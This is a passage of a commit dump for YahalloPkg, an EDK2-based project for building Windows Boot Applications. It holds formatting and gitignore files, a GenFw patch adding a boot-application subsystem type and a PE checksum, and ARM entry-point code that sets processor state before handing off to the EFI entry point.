Initial commit

Build: introduce EDK2 BaseTools GenFw BootApp build

Introduce GenFw BootApp build capability so it is capable to build
Windows Boot Applications without external tool's assistance.

Signed-off-by: Bingxing Wang <[email protected]>

YahalloPkg: first real public release

Author: imbushuo

.clang-format

@@ -0,0 +1,17 @@
+Language: Cpp
+BreakBeforeBraces: Stroustrup
+PointerAlignment: Right
+IndentWidth: 2
+AccessModifierOffset: 0
+ColumnLimit: 80
+NamespaceIndentation: All
+AlignTrailingComments: true
+AllowAllParametersOfDeclarationOnNextLine: true
+AlwaysBreakTemplateDeclarations: true
+AlignAfterOpenBracket: AlwaysBreak
+UseTab: Never
+IncludeBlocks: Preserve
+AlignConsecutiveDeclarations: true
+AlignConsecutiveAssignments: true
+SpacesInParentheses: false
+SpaceBeforeParens: ControlStatements

.gitignore

@@ -0,0 +1,346 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/

Edk2Patches/0001-BaseTools-support-generation-of-Windows-Boot-Applica.patch

@@ -0,0 +1,271 @@
+From 9ba52e2620d0c674ed791b9e9bdf0dbf15900d92 Mon Sep 17 00:00:00 2001
+From: Bingxing Wang <i@imbushuo.net>
+Date: Sun, 25 Oct 2020 01:00:24 -0400
+Subject: [PATCH] BaseTools: support generation of Windows Boot Application
+
+Introduce the support for generating Windows Boot Application PE
+files with an override switch. In addition, Windows Boot Apps re
+quire PE checksum to be valid. GenFw doesn't populate the PE che
+cksum field, so this is also added.
+
+The checksum generation algorithm is taken from Windows NT 3.51
+public SDK's source.
+
+Signed-off-by: Bingxing Wang <i@imbushuo.net>
+---
+ BaseTools/Source/C/Common/BasePeCoff.c        |   6 +-
+ BaseTools/Source/C/GenFw/GenFw.c              | 114 ++++++++++++++++++
+ .../C/Include/IndustryStandard/PeImage.h      |   5 +
+ 3 files changed, 123 insertions(+), 2 deletions(-)
+
+diff --git a/BaseTools/Source/C/Common/BasePeCoff.c b/BaseTools/Source/C/Common/BasePeCoff.c
+index 62fbb2985c..6b536772f1 100644
+--- a/BaseTools/Source/C/Common/BasePeCoff.c
++++ b/BaseTools/Source/C/Common/BasePeCoff.c
+@@ -185,7 +185,8 @@ Returns:
+       ImageContext->Machine != EFI_IMAGE_MACHINE_EBC  && \
+       ImageContext->Machine != EFI_IMAGE_MACHINE_AARCH64 && \
+       ImageContext->Machine != EFI_IMAGE_MACHINE_RISCV64) {
+-    if (ImageContext->Machine == IMAGE_FILE_MACHINE_ARM) {
++    if (ImageContext->Machine == IMAGE_FILE_MACHINE_ARM ||
++        ImageContext->Machine == IMAGE_FILE_MACHINE_ARMNT) {
+       //
+       // There are two types of ARM images. Pure ARM and ARM/Thumb.
+       // If we see the ARM say it is the ARM/Thumb so there is only
+@@ -219,7 +220,8 @@ Returns:
+   if (ImageContext->ImageType != EFI_IMAGE_SUBSYSTEM_EFI_APPLICATION && \
+       ImageContext->ImageType != EFI_IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER && \
+       ImageContext->ImageType != EFI_IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER && \
+-      ImageContext->ImageType != EFI_IMAGE_SUBSYSTEM_SAL_RUNTIME_DRIVER) {
++      ImageContext->ImageType != EFI_IMAGE_SUBSYSTEM_SAL_RUNTIME_DRIVER &&
++      ImageContext->ImageType != EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION) {
+     //
+     // unsupported PeImage subsystem type
+     //
+diff --git a/BaseTools/Source/C/GenFw/GenFw.c b/BaseTools/Source/C/GenFw/GenFw.c
+index 8cab70ba4d..28b4c48f8c 100644
+--- a/BaseTools/Source/C/GenFw/GenFw.c
++++ b/BaseTools/Source/C/GenFw/GenFw.c
+@@ -87,6 +87,7 @@ UINT32 mImageTimeStamp = 0;
+ UINT32 mImageSize = 0;
+ UINT32 mOutImageType = FW_DUMMY_IMAGE;
+ BOOLEAN mIsConvertXip = FALSE;
++BOOLEAN mIsConvertArmToArmThumb2 = FALSE;
+ 
+ 
+ STATIC
+@@ -251,6 +252,11 @@ Returns:
+   fprintf (stdout, "  -r, --replace         Overwrite the input file with the output content.\n\
+                         If more input files are specified,\n\
+                         the last input file will be as the output file.\n");
++  fprintf (stdout, "  --convert-output-machine-arm-to-thumb2\n\
++                        If the output machine type is IMAGE_FILE_MACHINE_ARM\n\
++                        or ARMT, convert to IMAGE_FILE_MACHINE_ARMNT (Thumb2)\n");
++  fprintf (stdout, "  --windows-boot-application\n\
++                        Force subsystem type to WINDOWS_BOOT_APPLICATION\n");
+   fprintf (stdout, "  -g HiiPackageListGuid, --hiiguid HiiPackageListGuid\n\
+                         Guid is used to specify hii package list guid.\n\
+                         Its format is xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\n\
+@@ -1032,6 +1038,46 @@ Returns:
+   return Status;
+ }
+ 
++UINT16 ChkSum(
++  UINT32 PartialSum, 
++  UINT16* Source, 
++  UINT32 Length
++  )
++/*++
++
++Routine description:
++
++  ChkSum() - Compute a partial checksum on a portion of an imagefile.
++  Taken from Windows NT 3.51 SDK distribution.
++
++  FROM "imagehlp/imagedir.c": Steve Wood 18-Aug-1989
++
++Arguments:
++
++  PartialSum      Supplies the initial checksum value.
++  Sources         Supplies a pointer to the array of words for which the
++  checksum is computed. 
++  Length          Supplies the length of the array in words.
++
++Returns:
++  The computed checksum value is returned as the function value.
++
++--*/
++{
++  // Compute the word wise checksum allowing carries to occur into the
++  // high order half of the checksum longword.
++  while (Length--) {
++    PartialSum += *Source++;
++    PartialSum = (PartialSum >> 16) + (PartialSum & 0xffff);
++  }
++
++  //
++  // Fold final carry into a single word result and return the resultant
++  // value.
++  //
++  return (UINT16)(((PartialSum >> 16) + PartialSum) & 0xffff);
++}
++
+ int
+ main (
+   int  argc,
+@@ -1116,6 +1162,9 @@ Returns:
+   time_t                           OutputFileTime;
+   struct stat                      Stat_Buf;
+   BOOLEAN                          ZeroDebugFlag;
++  UINTN                            DesiredSubsystemOverride;
++  UINT16                           PartialSum;
++  UINT16                           *AdjustSum;
+ 
+   SetUtilityName (UTILITY_NAME);
+ 
+@@ -1165,6 +1214,10 @@ Returns:
+   OutputFileTime         = 0;
+   ZeroDebugFlag          = FALSE;
+ 
++  DesiredSubsystemOverride = -1;
++  PartialSum = 0;
++  AdjustSum = NULL;
++
+   if (argc == 1) {
+     Error (NULL, 0, 1001, "Missing options", "No input options.");
+     Usage ();
+@@ -1304,6 +1357,20 @@ Returns:
+       continue;
+     }
+ 
++    if (stricmp (argv[0], "--convert-output-machine-arm-to-thumb2") == 0) {
++      mIsConvertArmToArmThumb2 = TRUE;
++      argc --;
++      argv ++;
++      continue;
++    }
++
++    if (stricmp (argv[0], "--windows-boot-application") == 0) {
++      DesiredSubsystemOverride = EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION;
++      argc --;
++      argv ++;
++      continue;
++    }
++
+     if ((stricmp (argv[0], "-m") == 0) || (stricmp (argv[0], "--mcifile") == 0)) {
+       mOutImageType = FW_MCI_IMAGE;
+       argc --;
+@@ -2045,6 +2112,11 @@ Returns:
+           Type = EFI_IMAGE_SUBSYSTEM_SAL_RUNTIME_DRIVER;
+           VerboseMsg ("Efi Image subsystem type is efi sal runtime driver.");
+ 
++      } else if (stricmp (ModuleType, "WINDOWS_BOOT_APPLICATION") == 0 ||
++        stricmp (ModuleType, "BOOT_APPLICATION") == 0) {
++          Type = EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION;
++          VerboseMsg ("Efi Image subsystem type is windows boot application.");
++
+       } else {
+         Error (NULL, 0, 1003, "Invalid option value", "EFI_FILETYPE = %s", ModuleType);
+         goto Finish;
+@@ -2052,6 +2124,11 @@ Returns:
+     }
+   }
+ 
++  if (DesiredSubsystemOverride != -1) {
++    VerboseMsg ("Forcibly converting Efi Image subsystem type to windows boot application.");
++    Type = EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION;
++  }
++
+   //
+   // Convert ELF image to PeImage
+   //
+@@ -2187,6 +2264,13 @@ Returns:
+     PeHdr->Pe32.FileHeader.Machine = IMAGE_FILE_MACHINE_ARMT;
+   }
+ 
++  if (mIsConvertArmToArmThumb2 &&
++      (PeHdr->Pe32.FileHeader.Machine == IMAGE_FILE_MACHINE_ARM ||
++       PeHdr->Pe32.FileHeader.Machine == IMAGE_FILE_MACHINE_ARMT)) {
++    VerboseMsg ("Converting output subsystem to IMAGE_FILE_MACHINE_ARMNT");
++    PeHdr->Pe32.FileHeader.Machine = IMAGE_FILE_MACHINE_ARMNT;
++  }
++
+   //
+   // Set new base address into image
+   //
+@@ -2657,6 +2741,36 @@ Returns:
+     }
+   }
+ 
++  //
++  // Normally PE/COFF checksum is not required, but in certain scenarios
++  // This is useful (for instance, Windows Boot Manager checks it)
++  //
++  // The following code is taken from Windows NT 3.51 SDK distribution.
++  //
++  if (mOutImageType == FW_EFI_IMAGE && PeHdr->Pe32.OptionalHeader.Magic == EFI_IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
++    Optional32 = (EFI_IMAGE_OPTIONAL_HEADER32 *)&PeHdr->Pe32.OptionalHeader;
++    PartialSum = ChkSum(0, (UINT16*) FileBuffer, (FileLength + 1) >> 1);
++
++    AdjustSum = (UINT16*) &Optional32->CheckSum;
++    PartialSum -= (PartialSum < AdjustSum[0]);
++    PartialSum -= AdjustSum[0];
++    PartialSum -= (PartialSum < AdjustSum[1]);
++    PartialSum -= AdjustSum[1];
++
++    Optional32->CheckSum = (UINT32) PartialSum + FileLength;
++  } else if (mOutImageType == FW_EFI_IMAGE && PeHdr->Pe32.OptionalHeader.Magic == EFI_IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
++    Optional64 = (EFI_IMAGE_OPTIONAL_HEADER64 *)&PeHdr->Pe32.OptionalHeader;
++    PartialSum = ChkSum(0, (UINT16*) FileBuffer, (FileLength + 1) >> 1);
++
++    AdjustSum = (UINT16*) &Optional64->CheckSum;
++    PartialSum -= (PartialSum < AdjustSum[0]);
++    PartialSum -= AdjustSum[0];
++    PartialSum -= (PartialSum < AdjustSum[1]);
++    PartialSum -= AdjustSum[1];
++
++    Optional64->CheckSum = (UINT32) PartialSum + FileLength;
++  }
++
+ WriteFile:
+   //
+   // Update Image to EfiImage or TE image
+diff --git a/BaseTools/Source/C/Include/IndustryStandard/PeImage.h b/BaseTools/Source/C/Include/IndustryStandard/PeImage.h
+index f17b8ee19b..0b025a549a 100644
+--- a/BaseTools/Source/C/Include/IndustryStandard/PeImage.h
++++ b/BaseTools/Source/C/Include/IndustryStandard/PeImage.h
+@@ -23,6 +23,8 @@
+ #define EFI_IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER      12
+ #define EFI_IMAGE_SUBSYSTEM_SAL_RUNTIME_DRIVER      13
+ 
++#define EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
++
+ //
+ // BugBug: Need to get a real answer for this problem. This is not in the
+ //         PE specification.
+@@ -33,12 +35,14 @@
+ //
+ #define EFI_IMAGE_SUBSYSTEM_SAL_RUNTIME_DRIVER  13
+ 
++
+ //
+ // PE32+ Machine type for EFI images
+ //
+ #define IMAGE_FILE_MACHINE_I386     0x014c
+ #define IMAGE_FILE_MACHINE_EBC      0x0EBC
+ #define IMAGE_FILE_MACHINE_X64      0x8664
++#define IMAGE_FILE_MACHINE_ARMNT    0x01c4  // 32-bit ARMv7-based Thumb2
+ #define IMAGE_FILE_MACHINE_ARM      0x01c0  // Thumb only
+ #define IMAGE_FILE_MACHINE_ARMT     0x01c2  // 32bit Mixed ARM and Thumb/Thumb 2  Little Endian
+ #define IMAGE_FILE_MACHINE_ARM64    0xAA64  // 64bit ARM Architecture, Little Endian
+@@ -50,6 +54,7 @@
+ #define EFI_IMAGE_MACHINE_IA32      IMAGE_FILE_MACHINE_I386
+ #define EFI_IMAGE_MACHINE_EBC       IMAGE_FILE_MACHINE_EBC
+ #define EFI_IMAGE_MACHINE_X64       IMAGE_FILE_MACHINE_X64
++#define EFI_IMAGE_MACHINE_ARMNT     IMAGE_FILE_MACHINE_ARMNT
+ #define EFI_IMAGE_MACHINE_ARMT      IMAGE_FILE_MACHINE_ARMT
+ #define EFI_IMAGE_MACHINE_AARCH64   IMAGE_FILE_MACHINE_ARM64
+ #define EFI_IMAGE_MACHINE_RISCV64   IMAGE_FILE_MACHINE_RISCV64
+-- 
+2.17.1
+

Edk2Patches/README.txt

@@ -0,0 +1,7 @@
+The patch provided in this folder is a workaround for EDK2 build system in order
+to generate valid Windows Boot Application.
+
+To apply this:
+
+    git apply YahalloPkg/Edk2Patches/0001-BaseTools-support-generation-of-Windows-Boot-Applica.patch
+    make -C BaseTools

Include/IndustryStandard/WindowsBootManager.h

@@ -0,0 +1,159 @@
+/** @file
+  Module entry point library for Windows Boot Applications.
+
+Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
+Copyright (c) 1996 - 2020, The ReactOS Project. All rights reserved.<BR>
+Copyright (c) 2019 - 2020, Bingxing Wang. All rights reserved.<BR>
+SPDX-License-Identifier: GPL-2.0-only
+
+**/
+
+#ifndef __WINDOWS_BOOT_APPLICATION_ENTRY_POINT_H__
+#define __WINDOWS_BOOT_APPLICATION_ENTRY_POINT_H__
+
+#include <IndustryStandard/WindowsBootManager.h>
+
+///
+/// Declare the EFI/UEFI Specification Revision to which this driver is
+/// implemented
+///
+extern CONST UINT32 _gUefiDriverRevision;
+
+/**
+  Entry point to UEFI Application.
+
+  This function is the entry point for a UEFI Application. This function must
+call ProcessLibraryConstructorList(), ProcessModuleEntryPointList(), and
+ProcessLibraryDestructorList(). The return value from
+ProcessModuleEntryPointList() is returned. If _gUefiDriverRevision is not zero
+and SystemTable->Hdr.Revision is less than _gUefiDriverRevison, then return
+EFI_INCOMPATIBLE_VERSION.
+
+  @param  ImageHandle  The image handle of the UEFI Application.
+  @param  SystemTable  A pointer to the EFI System Table.
+
+  @retval  EFI_SUCCESS               The UEFI Application exited normally.
+  @retval  EFI_INCOMPATIBLE_VERSION  _gUefiDriverRevision is greater than
+SystemTable->Hdr.Revision.
+  @retval  Other                     Return value from
+ProcessModuleEntryPointList().
+
+**/
+EFI_STATUS
+EFIAPI
+_EfiModuleEntryPoint(
+    IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable);
+
+/**
+  Required by the EBC compiler and identical in functionality to
+_ModuleEntryPoint().
+
+  @param  ImageHandle  The image handle of the UEFI Application.
+  @param  SystemTable  A pointer to the EFI System Table.
+
+  @retval  EFI_SUCCESS               The UEFI Application exited normally.
+  @retval  EFI_INCOMPATIBLE_VERSION  _gUefiDriverRevision is greater than
+SystemTable->Hdr.Revision.
+  @retval  Other                     Return value from
+ProcessModuleEntryPointList().
+
+**/
+EFI_STATUS
+EFIAPI
+EfiMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable);
+
+/**
+  Invokes the library destructors for all dependent libraries and terminates
+  the UEFI Application.
+
+  This function calls ProcessLibraryDestructorList() and the EFI Boot Service
+Exit() with a status specified by Status.
+
+  @param  Status  Status returned by the application that is exiting.
+
+**/
+VOID EFIAPI Exit(IN EFI_STATUS Status);
+
+/**
+  Autogenerated function that calls the library constructors for all of the
+module's dependent libraries.
+
+  This function must be called by _ModuleEntryPoint().
+  This function calls the set of library constructors for the set of library
+instances that a module depends on. This includes library instances that a
+module depends on directly and library instances that a module depends on
+indirectly through other libraries. This function is autogenerated by build
+tools and those build tools are responsible for collecting the set of library
+instances, determine which ones have constructors, and calling the library
+constructors in the proper order based upon each of the library instances own
+dependencies.
+
+  @param  ImageHandle  The image handle of the UEFI Application.
+  @param  SystemTable  A pointer to the EFI System Table.
+
+**/
+VOID EFIAPI ProcessLibraryConstructorList(
+    IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable);
+
+/**
+  Autogenerated function that calls the library descructors for all of the
+module's dependent libraries.
+
+  This function may be called by _ModuleEntryPoint()or Exit().
+  This function calls the set of library destructors for the set of library
+instances that a module depends on.  This includes library instances that a
+module depends on directly and library instances that a module depends on
+indirectly through other libraries. This function is autogenerated by build
+tools and those build tools are responsible for collecting the set of library
+instances, determine which ones have destructors, and calling the library
+destructors in the proper order based upon each of the library instances own
+dependencies.
+
+  @param  ImageHandle  The image handle of the UEFI Application.
+  @param  SystemTable  A pointer to the EFI System Table.
+
+**/
+VOID EFIAPI ProcessLibraryDestructorList(
+    IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable);
+
+/**
+  This function calls the set of module entry points. It must be called by
+_ModuleEntryPoint().
+
+  This function is autogenerated by build tools and those build tools are
+  responsible for collecting the module entry points and calling them in a
+specified order.
+
+  @param  ImageHandle    The image handle of the UEFI Application.
+  @param  SystemTable    A pointer to the EFI System Table.
+
+  @retval  EFI_SUCCESS   The UEFI Application executed normally.
+  @retval  !EFI_SUCCESS  The UEFI Application failed to execute normally.
+
+**/
+EFI_STATUS
+EFIAPI
+ProcessModuleEntryPointList(
+    IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable);
+
+/**
+ Windows Boot Application's version of _ModuleEntryPoint.
+
+ This function is the entry point for a Windows Boot Application. This function
+ performs required processor state switch, then hands over control to
+ EFI's entry point, see BlpEfiMain for details.
+
+ @param BootAppParameters           Boot Application Params
+ @param LibraryParameters           Library Params, remains unused.
+
+ @retval STATUS_SUCCESS             The boot application exited normally.
+ @retval STATUS_INVALID_PARAMETER   The boot application entry doesn't contain
+valid app params.
+
+**/
+NTSTATUS
+_ModuleEntryPoint(
+    IN PBOOT_APPLICATION_PARAMETER_BLOCK BootAppParameters,
+    IN PBL_LIBRARY_PARAMETERS LibraryParameters);
+
+#endif

Include/Library/WindowsBootApplicationEntryPoint.h

@@ -0,0 +1,247 @@
+/** @file
+  Entry point library instance to a Windows Boot Manager application.
+
+Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
+Copyright (c) 1996 - 2020, The ReactOS Project. All rights reserved.<BR>
+Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All rights
+reserved.<BR> SPDX-License-Identifier: GPL-2.0-only
+
+**/
+
+#include <Uefi.h>
+
+#include <Library/BaseLib.h>
+#include <Library/DebugLib.h>
+#include <Library/UefiBootServicesTableLib.h>
+#include <Library/WindowsBootApplicationEntryPoint.h>
+
+#include <Library/ArmLib.h>
+#include <Library/CacheMaintenanceLib.h>
+
+#include "Arm/ArmV7Lib.h"
+
+/**
+  Entry point to UEFI Application.
+
+  This function is the entry point for a UEFI Application. This function must
+call ProcessLibraryConstructorList(), ProcessModuleEntryPointList(), and
+ProcessLibraryDestructorList(). The return value from
+ProcessModuleEntryPointList() is returned. If _gUefiDriverRevision is not zero
+and SystemTable->Hdr.Revision is less than _gUefiDriverRevison, then return
+EFI_INCOMPATIBLE_VERSION.
+
+  @param  ImageHandle                The image handle of the UEFI Application.
+  @param  SystemTable                A pointer to the EFI System Table.
+
+  @retval  EFI_SUCCESS               The UEFI Application exited normally.
+  @retval  EFI_INCOMPATIBLE_VERSION  _gUefiDriverRevision is greater than
+SystemTable->Hdr.Revision.
+  @retval  Other                     Return value from
+ProcessModuleEntryPointList().
+
+**/
+EFI_STATUS
+EFIAPI
+_EfiModuleEntryPoint(
+    IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable)
+{
+  EFI_STATUS Status;
+
+  if (_gUefiDriverRevision != 0) {
+    //
+    // Make sure that the EFI/UEFI spec revision of the platform is >= EFI/UEFI
+    // spec revision of the application.
+    //
+    if (SystemTable->Hdr.Revision < _gUefiDriverRevision) {
+      return EFI_INCOMPATIBLE_VERSION;
+    }
+  }
+
+  //
+  // Call constructor for all libraries.
+  //
+  ProcessLibraryConstructorList(ImageHandle, SystemTable);
+
+  //
+  // Call the module's entry point
+  //
+  Status = ProcessModuleEntryPointList(ImageHandle, SystemTable);
+
+  //
+  // Process destructor for all libraries.
+  //
+  ProcessLibraryDestructorList(ImageHandle, SystemTable);
+
+  //
+  // Return the return status code from the driver entry point
+  //
+  return Status;
+}
+
+/**
+  Invokes the library destructors for all dependent libraries and terminates
+  the UEFI Application.
+
+  This function calls ProcessLibraryDestructorList() and the EFI Boot Service
+Exit() with a status specified by Status.
+
+  @param  Status  Status returned by the application that is exiting.
+
+**/
+VOID EFIAPI Exit(IN EFI_STATUS Status)
+
+{
+  ProcessLibraryDestructorList(gImageHandle, gST);
+
+  gBS->Exit(gImageHandle, Status, 0, NULL);
+}
+
+/**
+  Required by the EBC compiler and identical in functionality to
+_ModuleEntryPoint().
+
+  @param  ImageHandle  The image handle of the UEFI Application.
+  @param  SystemTable  A pointer to the EFI System Table.
+
+  @retval  EFI_SUCCESS               The UEFI Application exited normally.
+  @retval  EFI_INCOMPATIBLE_VERSION  _gUefiDriverRevision is greater than
+SystemTable->Hdr.Revision.
+  @retval  Other                     Return value from
+ProcessModuleEntryPointList().
+
+**/
+EFI_STATUS
+EFIAPI
+EfiMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable)
+{
+  return _EfiModuleEntryPoint(ImageHandle, SystemTable);
+}
+
+STATIC
+VOID BlpArmSetExeceptionContext(IN PBL_FIRMWARE_DESCRIPTOR FirmwareDescriptor)
+{
+  UINT32 VbarValue;
+
+  VbarValue = FirmwareDescriptor->ExceptionState.Vbar;
+  ArmWriteVBar(FirmwareDescriptor->ExceptionState.Vbar);
+  ArmInstructionSynchronizationBarrier();
+}
+
+STATIC
+VOID BlpArmSetThreadContext(IN PBL_FIRMWARE_DESCRIPTOR FirmwareDescriptor)
+{
+  UINT32 TpidrprwValue;
+  UINT32 SctlrValue;
+
+  TpidrprwValue = FirmwareDescriptor->ExceptionState.IdSvcRW;
+  ArmWriteTpidrprw(TpidrprwValue);
+  ArmInstructionSynchronizationBarrier();
+
+  SctlrValue = FirmwareDescriptor->ExceptionState.Control;
+  ArmWriteSctlr(SctlrValue);
+
+  ArmInvalidateTlb();
+  ArmInvalidateBtac();
+  ArmDataSynchronizationBarrier();
+  ArmInstructionSynchronizationBarrier();
+}
+
+STATIC
+VOID BlpArmSetPagingContext(IN PBL_FIRMWARE_DESCRIPTOR FirmwareDescriptor)
+{
+  UINT32 TtbrValue;
+
+  TtbrValue = FirmwareDescriptor->MmState.HardwarePageDirectory |
+              FirmwareDescriptor->MmState.TTB_Config;
+  ArmSetTTBR0((VOID *)TtbrValue);
+  ArmInstructionSynchronizationBarrier();
+
+  ArmInvalidateTlb();
+  ArmInvalidateBtac();
+  ArmDataSynchronizationBarrier();
+  ArmInstructionSynchronizationBarrier();
+}
+
+STATIC
+UINT32 BlpArmDisableInterrupts(IN PBL_FIRMWARE_DESCRIPTOR FirmwareDescriptor)
+{
+  UINT32 OldInterruptState;
+
+  OldInterruptState = FirmwareDescriptor->InterruptState;
+  ArmDisableInterrupts();
+
+  return OldInterruptState;
+}
+
+STATIC
